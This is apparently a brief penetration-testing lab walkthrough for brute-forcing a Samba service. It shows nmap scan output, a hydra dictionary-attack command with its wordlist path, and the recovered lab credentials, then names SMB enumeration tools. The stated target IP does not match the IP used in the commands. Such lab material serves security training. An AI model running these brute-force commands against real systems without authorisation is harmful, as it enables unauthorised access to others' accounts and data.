🔬SAMBA
Lab 1
🔬 Samba Recon: Dictionary Attack
Target IP:
192.174.58.3Brute-force of SAMBA service
Enumeration, brute-force, tools and flags have been already covered in this SMB Enum Lab 6
Enumeration
ip -br -c a
nmap -sV 192.34.128.3139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)📌 Server is running SAMBA on the standard port
445
Brute-Force
gzip -d /usr/share/wordlists/rockyou.txt.gzhydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.34.128.3 smb[445][smb] host: 192.34.128.3 login: admin password: password1
Login and Enumeration
Use
SMBMaptool
Use
smbclienttool to access Samba sources
Use
enum4linuxtool


Last updated
Was this helpful?